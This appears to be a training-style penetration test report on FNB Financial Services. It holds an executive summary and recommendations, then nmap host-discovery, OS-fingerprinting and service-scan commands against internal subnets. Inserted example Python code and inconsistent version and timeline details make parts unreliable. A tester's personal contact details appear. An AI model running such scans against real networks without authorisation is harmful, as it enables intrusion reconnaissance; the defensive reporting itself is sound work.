
XSecurity, LLC CONFIDENTIAL Penetration Test Report for FNB Financial Services

XSecurity, LLC
Suite 180, Albuquerque, NM 87048 USA
Phone 505.xxx.xxxx, Fax 505.xxx.xxxx

FNB Financial Services
2101 Massachusetts Ave NW
Washington DC 20008
United States

CONFIDENTIAL Page | Error: Reference source not found



XSecurity, LLC
Penetration Testing and Security Audit for FNB Financial Services

Warning: THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, MAY CONTAIN INFORMATION THAT COULD
SEVERELY DAMAGE OR IMPACT THE INTEGRITY AND SECURITY OF THE ORGANIZATION IF DISCLOSED PUBLICLY.
THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, SHOULD BE SAFEGUARDED AT ALL TIMES AND
MAINTAINED IN A SECURE AREA WHEN NOT IN USE. XSECURITY, LLC ASSUMES NO RESPONSIBILITY OR LIABILITY
FOR THE SECURITY OF THIS DOCUMENT OR ANY ACCOMPANYING MATERIALS AFTER DELIVERY TO THE
ORGANIZATION NAMED HEREIN. IT IS THE ORGANIZATION'S RESPONSIBILITY TO SAFEGUARD THIS MATERIAL
AFTER DELIVERY.

THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR
OTHERWISE DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF XSECURITY OR THEIR DESIGNATED
REPRESENTATIVE. USE OF THIS REPORTING FORMAT BY OTHER THAN XSECURITY OR ITS SUBSIDIARIES IS STRICTLY
PROHIBITED AND MAY BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.

Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD
“BEST PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS. ANY RECOMMENDED CHANGES TO
THE OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.

XSECURITY, LLC
SUITE 180 ● ALBUQUERQUE, NM 87048 USA
PHONE 505.XXX.XXXX ● FAX 505.XXX.XXXX

Document Details

Document Title: Penetration Testing Report
Company:        XSecurity, LLC
Recipient:      FNB Financial Services
Date:           6th Jan, 2017
Classification: Confidential
Document Type:  Report
Version:        1.0
Author:         Abhijitt Chougulle
Pen Testers:    Abhijitt Chougulle, Sandeep Martis
Reviewed By:    Geeta Singh
Approved By:    Vikas Singh


Version History Information

Date            Version  Author              Comments
Jan 6th, 2017   v1.3     Vikas Singh         Final Draft
Dec 30th, 2016  v1.2     Geeta Singh         Checked for formatting and proofreading
Dec 21st, 2016  v1.1     Abhijitt Chougulle  Edited and made changes to content
Recipient

Name   Title                       Company
Smith  Penetration Testing Report  FNB Financial Services


Penetration Testing Team Members

Name                Company                 Role
Abhijitt Chougulle  XSecurity, LLC          Penetration Testing Data Collection
Sandeep Martis      XSecurity, LLC          Penetration Testing Data Collection
Divyesh Shah        XSecurity, LLC          Regional Security Practice Manager
Mangesh Shinde      XSecurity, LLC          FNB Financial Services Services Manager
Devis Baby          XSecurity, LLC          Principal Consultant
Hrushikesh Patil    XSecurity, LLC          Consultant, Security
Robert Jude         FNB Financial Services  Manager of Network Infrastructure
Vinay Nair          FNB Financial Services  Network Security Analyst

Contact

Name:    Abhijitt Chougulle
Address: IRIS C, UNNATHI GARDEN, OPP DEVDAYA NAGAR, OFF POKHARAN RD NO 1, THANE (W)-400606
Phone:   9819001791
Email:   abhijitt.chougulle@gmail.com

Table of Contents
Document Details........................................................................................................................................................3
Version History Information.......................................................................................................................................3
Recipient.....................................................................................................................................................................3
Penetration Testing Team Members...........................................................................................................................4
Contact........................................................................................................................................................................4
1.0 Executive Summary...........................................................................................................................................7
1.1. Project Scope.................................................................................................................................................8
1.2. Project Objectives.........................................................................................................................................8
1.3. Target Systems..............................................................................................................................................8
1.4. Assumptions..................................................................................................................................................9
1.5. Timeline........................................................................................................................................................9
1.6. Summary of Evaluation.................................................................................................................................9
1.7. Finding Rating Levels.................................................................................................................10
1.8. Risk Assessment Matrix..............................................................................................................10
1.1. Summary of Findings..................................................................................................................................11
1.2. Summary of Recommendation....................................................................................................................12
1.2.1. Personnel............................................................................................................................................12
1.2.2. Policies and Procedures......................................................................................................................12
1.2.3. Critical Vulnerabilities.......................................................................................................................12
1.2.4. Identification and Authentication.......................................................................................................13
1.2.5. Intrusion Detection.............................................................................................................................13
1.2.6. Conclusion..........................................................................................................................................14
1.3. Testing Methodology..................................................................................................................................14
1.3.1. Planning..............................................................................................................................................14
1.3.2. Exploitation........................................................................................................................................14
1.3.3. Reporting............................................................................................................................................14
2.0 Comprehensive Technical Report....................................................................................................................15
[Challenge 1:] Information Gathering......................................................................................................................15




[Challenge 2:] Network Scanning and Service Enumeration...................................................................................17


[Challenge 3:] Database Penetration Testing - SQL Injection..................................................................................20
[Challenge 4:] Cloud Penetration Testing.................................................................................................................25
[Challenge 5:] Penetration Testing WordPress Site for Plugin Vulnerabilities........................................................35
Appendixes...................................................................................................................................................................39
Appendix A: References...........................................................................................................................................40
Appendix B: Glossary...............................................................................................................................................41
List of Tables
Table 1 : Target system.................................................................................................................................................11
Table 2 : Timeline.........................................................................................................................................................12
Table 3 : Severity Levels..............................................................................................................14
Table 4 : Threat Levels.................................................................................................................................................14
Table 5 : Summary of findings.....................................................................................................................................14
Table 6: All Machines IP Address/Operating system/Host names/Open ports/Services running................................50




1.0 Executive Summary


XSecurity, LLC was engaged to conduct a penetration test (PT) on the
perimeter and network systems of FNB Financial Services during the period of 12th Nov 2016 to
11th Dec 2016. XSecurity's objective was to discover significant vulnerabilities within the FNB
Financial Services network infrastructure. The findings are to be utilized with a risk analysis to
assist in developing the security architecture for FNB Financial Services.
The most significant findings relate to the overall design philosophy behind the FNB Financial
Services trust model, the lack of a consistent Identification and Authentication (I&A) scheme,
the inconsistent and uneven implementation of and compliance with existing policies and
procedures, a lack of sufficient audit controls and procedures, and a significant number of
vulnerabilities that result in the network and systems being susceptible to compromise from the
internal network. The detailed penetration testing findings are described later in this document
and have been ordered according to severity.
The culture and philosophy of the company dictate the trust model. The trust model of an
organization is the philosophical basis upon which the security architecture is built. The security
architecture provides the common framework for all other security tools, policies, and
procedures. FNB Financial Services has a trust model that assumes the internal users of the
network are to be trusted. This model is designed to meet the business needs of FNB Financial
Services in which people routinely change locations within the building and resources need to be
allocated dynamically. The model is designed to meet the needs of a fluid and open business
environment.
The fluid environment at FNB Financial Services creates a situation in which control measures
cannot be easily added to the network infrastructure. Due to the lack of sufficient controls, there
is an environment that frequently results in violations of current policies and procedures that are
not necessarily prevented or detected. Additionally, there is not a mechanism in place to provide
a verified and non-repudiating identity of individuals in the event an intrusion was to occur.
Also, user IDs are locally administered and therefore inconsistent across systems. Finally, there
is an uneven administration of the current policies and procedures, and there are insufficient
reviews of audit logs and information collected from various systems.
The vulnerabilities found during this assessment present several risks to FNB Financial Services.
The most significant of these is that internal intrusions cannot be stopped and that both external
and internal intrusions cannot be detected. Information essential to the protection of critical data
is not available because it is not recorded. The situation is further exacerbated by the discovery
of significant vulnerabilities that would allow an internal user to easily compromise the most
critical information resources. In effect, an internal user could access almost any critical aspect
of the infrastructure and not only would they succeed, but there would be no record of the
intrusion and there would be almost no way of proving if the intrusion occurred or did not occur.
In conclusion, XSecurity strongly recommends that FNB Financial Services install several
intrusion detection systems (IDS) and develop a consistent user Identification and Authentication
Service (I&A) inside the network. XSecurity, LLC also recommends an increase in internal audit
controls to ensure compliance with existing policies and to ensure that timely and adequate
review of log files is occurring.

1.1. Project Scope

The assessment performed was focused on FNB Financial Services' internal network and its
related application infrastructure. This report is intended to be an overall assessment of the FNB
Financial Services network, and of those systems and subnets that fall within the scope of this
project.
Furthermore, the findings in this report reflect the conditions found during the testing, and do not
necessarily reflect current conditions.

1.2. Project Objectives

The objective of FNB Financial Services’ network and application assessment is to determine the
overall security by analyzing all possible transactions, user input variables, and application
components that reside on network systems. For the testing, we attempted to perform a black-box
test.
The objective of the security assessment and penetration test of the network infrastructure
supporting the application is to determine the overall security of the network segments and hosts
within the scope of the engagement.
1.3. Target Systems

The following table lists all devices that were targeted during this assessment.

Target System Name:      FNB Financial Services
Target System URL:       http://www.fnb.com
Test Type:               Gray Box
IP Addresses Discovered: 172.19.19.1, 172.19.19.2, 172.19.19.3, 172.19.19.4, 172.19.19.5,
                         172.19.19.6, 172.19.19.7, 172.19.19.8, 172.19.19.9, 172.19.19.10,
                         172.17.0.1, 172.17.0.2, 172.17.0.3, 10.10.0.1, 10.10.0.2, 10.10.0.3
Network Details:         Client-server
Web Server:              www.fnb.com, http://10.10.0.2/moviescope, http://10.10.0.2/xsecurity
Network Ports:           80, 445, 22
System Configuration:    Intel Core i5, 64-bit, 2.67GHz
Table 1: Target system




1.4. Assumptions

We assumed that all IP addresses are public IP addresses and that the organization has implemented
the security policies applicable to them.

1.5. Timeline

The timeline of the test is as below:

Categories  Initiation Date/Time  Completion Date/Time
Day 1       18th Nov 2016         1st Dec 2016
Day 2       19th Nov 2016         11th Dec 2016
Day 3       2nd Dec 2016          4th Dec 2016
Day 4       4th Dec 2016          11th Dec 2016
Day 5       21st Dec 2016         6th Jan 2017
Table 2: Timeline
1.6. Summary of Evaluation

- Perform broad scans to identify potential areas of exposure and services that may act as
  entry points
- Perform targeted scans and manual investigation to validate vulnerabilities
- The test identified components to gain access to:
  - <10 IP addressed devices>
- Identify and validate vulnerabilities
- Rank vulnerabilities based on threat level, loss potential, and likelihood of exploitation
- Perform supplemental research and development activities to support analysis
- Identify issues of immediate consequence and recommend solutions
- Develop long-term recommendations to enhance security
- Transfer knowledge
During the network level security checks we tried to probe the ports present on the various
servers and detect the services running on them with the existing security holes, if any. At the
web application level, we checked the web servers’ configuration issues, and more importantly
the logical errors in the web application itself.

1.7. Finding Rating Levels

In the following Findings section, XSecurity, LLC uses a rating system using stars (*) to indicate
the level of severity of our findings. All findings are vulnerabilities that pose a business risk to
FNB Financial Services.

5 Stars  *****  Critical  Intruders can easily gain control of hosts and network. This
                          needs immediate attention.
4 Stars  ****   High      Intruders can possibly gain control of the host, or there may
                          be potential leakage of highly sensitive information. This
                          should be addressed as soon as possible.
3 Stars  ***    Elevated  This could result in potential misuse of the host by intruders.
                          Address this at your convenience but do so as soon as possible.
2 Stars  **     Moderate  Intruders may be able to collect sensitive information from
                          the host, such as the precise version of software installed.
                          With this information, intruders can easily exploit known
                          vulnerabilities specific to software versions. Address this the
                          next time you perform a minor reconfiguration of the host.
1 Star   *      Low       Intruders can collect information about the host (open ports,
                          services, etc.) and may be able to use this information to find
                          other vulnerabilities. Address this the next time you perform
                          a major reconfiguration of the host.
Table 3: Severity Levels
1.8. Risk Assessment Matrix

Figure 1: Risk Matrix

L  Low     1-4
M  Medium  4-12
H  High    12-25
Table 4: Threat Levels

1.1. Summary of Findings

Value   Number of Risks
Low     4
Medium  3
High    2
Table 5: Summary of findings




Figure 2: Summary of findings


1.2. Summary of Recommendation

This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of
the various issues brought forth in the Executive Summary and provides further illumination on
the more significant risks to FNB Financial Services.
1.2.1. Personnel
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individuals' or
groups' network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
fluid and changing nature of the environment. However, a documented rationale should
accompany any risks that are accepted.
FNB Financial Services has several knowledgeable and skilled individuals in the Information
Technology department. These individuals are aware of security-related issues and
understand that their internal systems are completely open and accessible. They differ in their
opinions as to the severity of this situation. The situation entrusts a great deal of power and
responsibility, to the point that any one of a handful of administrators, acting independently,
has the capability to compromise a system without any of the other administrators being
aware that any misuse has occurred. This requires a great deal of trust in these administrators,
which is evidently well placed; however, future employees who may hold these positions
may not be as trustworthy. Without measures in place to monitor the activity of such
individuals, current or future intrusions or compromises may not be detectable.

1.2.2. Policies and Procedures


FNB Financial Services has several policies and procedures in place to inform its users of the
responsibilities and obligations associated with the use of information resources. While the
policies in place are adequate in regard to what they address, there appear to be several
missing policies, either policies that are referenced and then are not readily available, or
policies considered necessary that do not appear to be present. These policies would
generally indicate how standards and procedures are to be created and how compliance with
the existing policies, standards, and procedures would be monitored. XSecurity, LLC also
observed and was told through interviews that there is uneven compliance and nonexistent
auditing of these policies.

1.2.3. Critical Vulnerabilities


The large number of vulnerabilities discovered, both those that are critical in and of
themselves as well as those that can be exploited in concert to become critical vulnerabilities,
leave many of the most sensitive systems at FNB Financial Services exposed to internal
users. The firewall and perimeter devices are configured in such a way that it would be very
difficult for an outside user to successfully attack one of the sensitive systems. This is not the
case for an attacker on the inside. Any knowledgeable user could gain complete access to all
of the critical systems of the infrastructure, including the Microsoft .NET Development
Servers and the core network components themselves.

1.2.4. Identification and Authentication


FNB Financial Services does not have an Identification & Authentication (I&A) process.
With the absence of an I&A service, it becomes very difficult to correlate events across
multiple platforms and link them into a single entity. It would also be nearly impossible to
trace an event to an individual or group. These events are occurring, as XSecurity, LLC
noted, during some of the Penetration Testing tests. User IDs and passwords only provide
single-factor identification. In systems where the value of the resource justifies stronger
authentication and the ability to trace a user identity, there must be at least two-factor
authentication: one that is unique to the individual and one generated randomly at the time
credentials are presented. An I&A service, with a time service such as the one FNB Financial
Services already has, can also address one of the more difficult problems that exists in
modern networked environments, the issue surrounding time of a change in privilege versus
the time of privilege usage.
The problem, known as TOCTOU (Time of Change versus Time of Use), comes from a
practice dating to the mainframe era, where a user's privileges were granted at log-in.
The user privileges were managed by the system's Reference Monitor, which was an integral
part of the operating system. Therefore, any change in the user's privilege level was
immediately enforced by the operating system, so there was no period of time when the user's
privileges that were in effect did not match the privileges that the user was invoking. In
networked environments, the practice still exists of granting privilege at the time of log-in.
However, because there is no centralized Reference Monitor that is directly tied into each
and every operating system on the network, a change in the user's privilege level is not
registered until the user logs off the network and then logs back on. This is the TOCTOU
problem. Identification and Authentication services, when coupled with a time service, can
resolve this issue in that they force users to present their credentials before accessing any
resource on the network. This provides a chance for the privileges to be checked, as well as
ensuring the authenticity of the identity of the user ID accessing the resource.
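The stale-privilege situation described above, as an added example that is not part of the XSecurity report: a privilege is revoked after log-in, a session that cached its privileges at log-in still honours it, while a session that re-checks the authoritative store at each access does not. The audit record also carries the policy version each decision was based on, so a log review can find decisions made on out-of-date privileges. PolicyStore, CachedSession, CheckedSession and the user and privilege names are hypothetical.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Set


@dataclass
class PolicyStore:
    """Authoritative privilege database, the role the Reference Monitor plays (hypothetical)."""
    grants: Dict[str, Set[str]] = field(default_factory=dict)
    version: int = 0  # incremented on every change; stands in for the 'time of change'

    def grant(self, user: str, privilege: str) -> None:
        self.grants.setdefault(user, set()).add(privilege)
        self.version += 1

    def revoke(self, user: str, privilege: str) -> None:
        self.grants.get(user, set()).discard(privilege)
        self.version += 1

    def has(self, user: str, privilege: str) -> bool:
        return privilege in self.grants.get(user, set())


@dataclass
class Decision:
    """One authorization decision, kept for later audit review."""
    user: str
    privilege: str
    allowed: bool
    policy_version_used: int     # version the decision was actually based on
    policy_version_current: int  # version in force at the time of use


AUDIT: List[Decision] = []


class CachedSession:
    """Privileges copied once at log-in and never re-read: the networked log-in practice."""

    def __init__(self, store: PolicyStore, user: str):
        self.store = store
        self.user = user
        self.privileges = set(store.grants.get(user, set()))
        self.version_at_login = store.version

    def authorize(self, privilege: str) -> bool:
        allowed = privilege in self.privileges
        AUDIT.append(Decision(self.user, privilege, allowed,
                              self.version_at_login, self.store.version))
        return allowed


class CheckedSession:
    """Credentials re-presented and privileges re-read at each access (I&A plus timely check)."""

    def __init__(self, store: PolicyStore, user: str):
        self.store = store
        self.user = user

    def authorize(self, privilege: str) -> bool:
        allowed = self.store.has(self.user, privilege)
        AUDIT.append(Decision(self.user, privilege, allowed,
                              self.store.version, self.store.version))
        return allowed


def stale_decisions() -> List[Decision]:
    """Audit review: decisions taken on a policy version older than the one in force."""
    return [d for d in AUDIT if d.policy_version_used != d.policy_version_current]


def demonstrate() -> Dict[str, object]:
    """Grant, log in twice, revoke, then use the privilege through both session kinds."""
    AUDIT.clear()
    store = PolicyStore()
    store.grant("alice", "db_admin")            # constructed user and privilege names
    cached = CachedSession(store, "alice")
    checked = CheckedSession(store, "alice")
    store.revoke("alice", "db_admin")           # privilege changes after log-in
    return {
        "cached_allows_after_revoke": cached.authorize("db_admin"),
        "checked_allows_after_revoke": checked.authorize("db_admin"),
        "stale_decisions": len(stale_decisions()),
    }


if __name__ == "__main__":
    print(demonstrate())
```

The cached session keeps allowing the revoked privilege until the user logs off and back on, which is the TOCTOU window; the checked session closes it, and the version pair in each audit record is what lets a reviewer spot decisions that were made on stale privileges.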

1.2.5. Intrusion Detection


Because of FNB Financial Services's open and fluid environment and the fact that new
network-based threats are identified almost daily, an effective means to detect, react, and
manage events is necessary. An IDS (intrusion detection system) to identify suspect activity
and alert someone of the risk is becoming an increasingly critical part of the security
architecture. In most environments, this would be coupled with segmentation of network
resources across internal firewalls or centralized I&A services. While segmentation may not
be feasible within the current FNB Financial Services trust model and architecture, I&A
services as well as increased auditing are possible.
An IDS that can conduct profiling as well as one that utilizes signatures would most likely be
the best fit for FNB Financial Services. The profiling of users, especially after the
implementation of an I&A service, would allow anomalous activity to be detected
immediately and would allow for an automated review of the various system logs that are not
being properly reviewed at this time.

1.2.6. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered
acceptably protected unless both the network segments and the critical hosts/servers are
monitored constantly for signs of abuse and intrusion attempts. Because new exploits and
vulnerabilities within devices and network operating systems are discovered regularly, it is
impossible to test a network completely, giving 100 percent assurance of being impervious to
penetration either from within or from outside. Additionally, FNB Financial Services has
chosen a trust model in which the application of stronger internal controls is more difficult
than in a more restrictive trust model. Therefore, the easiest method of detecting misuses
would be some type of intrusion detection system that is both network based and can do user
profiling. Without appropriate identification and authentication of users, referencing abuses
to specific individuals becomes unreliable. Without appropriate audit controls to ensure
compliance with policies, the policies and procedures themselves become untenable.
XSecurity, LLC believes the corrective actions and recommendations in this report will
improve FNB Financial Services's ability to avoid breaches of information security.

However, XSecurity, LLC strongly recommends that an Intrusion Detection and
Identification and Authentication capability be added to the network to detect misuse and
intrusions and provide the information necessary to support forensic investigations. It is also
recommended that additional audit controls such as compliance testing, independent log
review, or configuration audits be implemented, with the results of these controls
incorporated with the results of the IDS capability. A policy and procedure review, combined
with a risk analysis, would also be very beneficial at this point in time to streamline and
reiterate those policies that are critical to the functioning of the enterprise.

1.3. Testing Methodology

1.3.1. Planning
During planning, we gathered information about the server on which the web application is
installed. We then identified path information and identifiable software, and determined the
versions running.
1.3.2. Exploitation
Using the information gathered during planning, we searched for vulnerabilities in each piece of
software and service discovered, and then attempted to exploit them.
1.3.3. Reporting
Based on the results of the first two steps, we analyzed the results. Our risk rating is
based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we wrote up each risk and how to mitigate it.
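The rating calculation above, carried through to the threat levels of Table 4 and the per-level counts of Table 5, as an added example that is not part of the XSecurity report. The report gives the formula and the bands but not the scale of each factor, so this example assumes each factor is rated 1 to 5; because the bands in Table 4 touch at 4 and 12, it also assumes a boundary score falls into the higher band and that any score above 25 is still High. The finding identifiers and ratings are constructed.

```python
from collections import Counter
from typing import Dict, List, NamedTuple

# Assumed rating scale for each factor (the report does not state one).
SCALE_MIN, SCALE_MAX = 1, 5


class Finding(NamedTuple):
    ident: str
    threat: int
    vulnerability: int
    impact: int


def risk_score(threat: int, vulnerability: int, impact: int) -> int:
    """Risk = Threat * Vulnerability * Impact, after validating each factor's range."""
    for name, value in (("threat", threat), ("vulnerability", vulnerability), ("impact", impact)):
        if not SCALE_MIN <= value <= SCALE_MAX:
            raise ValueError(f"{name}={value} is outside the {SCALE_MIN}..{SCALE_MAX} scale")
    return threat * vulnerability * impact


def threat_level(score: int) -> str:
    """Map a score onto the bands of Table 4 (L 1-4, M 4-12, H 12-25).

    Assumption: a boundary score (4 or 12) belongs to the higher band, and scores
    above 25 are treated as High.
    """
    if score < 4:
        return "L"
    if score < 12:
        return "M"
    return "H"


def rate(finding: Finding) -> Dict[str, object]:
    score = risk_score(finding.threat, finding.vulnerability, finding.impact)
    return {"ident": finding.ident, "score": score, "level": threat_level(score)}


def order_by_severity(findings: List[Finding]) -> List[Dict[str, object]]:
    """Highest risk first, the order in which the report presents its findings."""
    return sorted((rate(f) for f in findings), key=lambda r: r["score"], reverse=True)


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per level, i.e. the content of a table like Table 5."""
    counts = Counter(rate(f)["level"] for f in findings)
    return {level: counts.get(level, 0) for level in ("L", "M", "H")}


# Constructed sample findings; identifiers and ratings are made up for the example.
SAMPLE_FINDINGS = [
    Finding("F-1", 1, 2, 1),
    Finding("F-2", 2, 2, 1),   # score 4: sits on the L/M boundary
    Finding("F-3", 3, 2, 2),   # score 12: sits on the M/H boundary
    Finding("F-4", 1, 1, 3),
    Finding("F-5", 2, 3, 1),
]

if __name__ == "__main__":
    for row in order_by_severity(SAMPLE_FINDINGS):
        print(row)
    print(summarize(SAMPLE_FINDINGS))
```

Whatever scale and boundary convention a team settles on, writing it down as code like this keeps the rating reproducible between testers and across report versions.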

2.0 Comprehensive Technical Report


CHALLENGE 1: Information Gathering
Objective:
Identify all the machines in the network. You have to present:
- IP addresses of all the machines
- Operating systems and their versions
- Open ports in all the machines
- Services running on all the open ports
Your scope of work in this challenge is limited to the scanning methodology.

Tools Used: Zenmap, SolarWinds, Nessus


Zenmap Tool:
The Zenmap tool is a graphical front end for the very popular Nmap command line tool.
Nmap is an open source tool for network security and auditing. Although Nmap is incredibly
powerful, when working with larger networks most administrators do not want to work with
command line only tools. And besides, as they say, "A picture is worth a thousand words". In this
case that is very much true because Zenmap will give you an interactive graphical map of your
network.

SolarWinds: IT monitoring and management tools are built for SysAdmins and network

Nessus: Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.

Methodology:
We needed to identify all the machines in the network without any prior details.
From the Windows machine, we first found the machine's gateway with ipconfig /all, i.e.
192.168.1.1 (screenshot given below).

Figure 1.1
Then, with the help of SolarWinds, we discovered the other network IP addresses, i.e.
172.19.19.1, 172.17.0.1 and 10.10.0.1 (screenshot given below).

Figure 1.2

Starting from 172.19.19.1, 172.17.0.1 and 10.10.0.1, we further discovered the live IP addresses
of the machines on the respective networks (screenshots given below).

Live hosts of network 172.19.19.0:

With the Zenmap tool and the command nmap -sn -T4 -v 172.19.19.1/24 we found the live hosts
172.19.19.1, 172.19.19.2, 172.19.19.3, 172.19.19.4, 172.19.19.5, 172.19.19.6, 172.19.19.7,
172.19.19.8, 172.19.19.9 and 172.19.19.10.


Figure 1.3

Live hosts of network 172.17.0.0:

With the Zenmap tool and the command nmap -sn -T4 -v 172.17.0.1/24 we found the live hosts
172.17.0.1, 172.17.0.2 and 172.17.0.3.


Figure 1.4

Live hosts of network 10.10.0.0:

With the Zenmap tool and the command nmap -sn -T4 -v 10.10.0.1/24 we found the live hosts
10.10.0.1, 10.10.0.2 and 10.10.0.3.


Figure 1.5
All Host Topology Diagram:


Operating systems and their versions:

Operating system and version of machine 10.10.0.1: Microsoft Windows Server 2003 with
Service Pack 2 (SP2) ver 5.2 and Build 3790

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.1 we discovered the
operating system and host name of machine 10.10.0.1

Figure 1.6

Operating system and version of machine 10.10.0.2:
Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.2 we discovered the
operating system and host name of machine 10.10.0.2


Figure 1.7

Operating system and version of machine 10.10.0.3:
Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 10.10.0.3 we discovered the
operating system and host name of machine 10.10.0.3


Figure 1.8
Operating system and version of machine 172.17.0.1:
Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.17.0.1 we discovered the
operating system and host name of machine 172.17.0.1

Operating system and version of machine 172.17.0.2:
Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.17.0.2 we discovered the
operating system and host name of machine 172.17.0.2


Figure 1.9

Operating system and version of machine 172.17.0.3:
Linux Kernel 2.6 on CentOS Release 6.4 Final

With the Zenmap tool we could not discover the operating system of this machine, hence we
used the Nessus tool to discover the operating system of 172.17.0.3


Figure 1.10

Operating system and version of machine 172.19.19.1:
Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.1 we discovered the
operating system and host name of machine 172.19.19.1

Operating system and version of machine 172.19.19.2:
Microsoft Windows 7 Ultimate with Service Pack 1 (SP1) ver 6.1 and Build 7601

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.2 we discovered the
operating system and host name of machine 172.19.19.2


Figure 1.11

Operating system and version of machine 172.19.19.3:
Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.3 we discovered the
operating system and host name of machine 172.19.19.3

Operating system and version of machine 172.19.19.4:
Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.4 we discovered the
operating system and host name of machine 172.19.19.4


Figure 1.11

Operating system and version of machine 172.19.19.5:
Linux Kernel 3.0 on Ubuntu 12.04

With the Zenmap tool we could not discover the operating system of this machine, hence we
used the Nessus tool to discover the operating system of 172.19.19.5


Figure 1.11

Operating system and version of machine 172.19.19.6:
Microsoft Windows Server 2012 Datacenter Edition

With the Zenmap tool we could not discover the operating system of this machine, hence we
used the Nessus tool to discover the operating system of 172.19.19.6


Figure 1.12

We found the host name (HRDEPT) of this machine through the aggressive scan command of nmap,
i.e. nmap -T4 -A -v 172.19.19.6

Operating system and version of machine 172.19.19.7:


Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.7 we discovered the
operating system and host name of machine 172.19.19.7

Operating system and version of machine 172.19.19.8:
Microsoft Windows XP

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.8 we discovered the
operating system and host name of machine 172.19.19.8

Figure 1.13


Operating system and version of machine 172.19.19.9:
Microsoft Windows 8 Pro with Service Pack 1 (SP1) ver 6.2 Build 9200

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.9 we discovered the
operating system and host name of machine 172.19.19.9

Operating system and version of machine 172.19.19.10:
Microsoft Windows 7 Ultimate with Service Pack 1 (SP1) ver 6.1 and Build 7601

With the Zenmap tool and the command nmap -p 445 --script smb-os-discovery 172.19.19.10 we discovered the
operating system and host name of machine 172.19.19.10

Figure 1.14


Open ports in all the machines / services running on all the open ports

Open ports and services running on machine 10.10.0.1:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 10.10.0.1/24 we discovered the open ports and
running services of machine 10.10.0.1

Figure 1.15

Open ports and services running on machine 10.10.0.2:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 10.10.0.2/24 we discovered the open ports and
running services of machine 10.10.0.2


Figure 1.16
Open ports and services running on machine 10.10.0.3:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 10.10.0.3/24 we discovered the open ports and
running services of machine 10.10.0.3


Figure 1.17

Open ports and services running on machine 172.17.0.1:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.17.0.1/24 we discovered the open ports and
running services of machine 172.17.0.1


Figure 1.18

Open ports and services running on machine 172.17.0.2:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.17.0.2/24 we discovered the open ports and
running services of machine 172.17.0.2


Figure 1.19

Open ports and services running on machine 172.17.0.3:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.17.0.3/24 we discovered the open ports and
running services of machine 172.17.0.3


Figure 1.20
Open ports and services running on machine 172.19.19.1:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.1/24 we discovered the open ports and
running services of machine 172.19.19.1

Figure 1.21

Open ports and services running on machine 172.19.19.2:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.2/24 we discovered the open ports and
running services of machine 172.19.19.2

Figure 1.22

Open ports and services running on machine 172.19.19.3:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.3/24 we discovered the open ports and
running services of machine 172.19.19.3


Figure 1.23


Open ports and services running on machine 172.19.19.4:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.4/24 we discovered the open ports and
running services of machine 172.19.19.4

Figure 1.24

Open ports and services running on machine 172.19.19.5:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.5/24 we discovered the open ports and
running services of machine 172.19.19.5


Figure 1.25

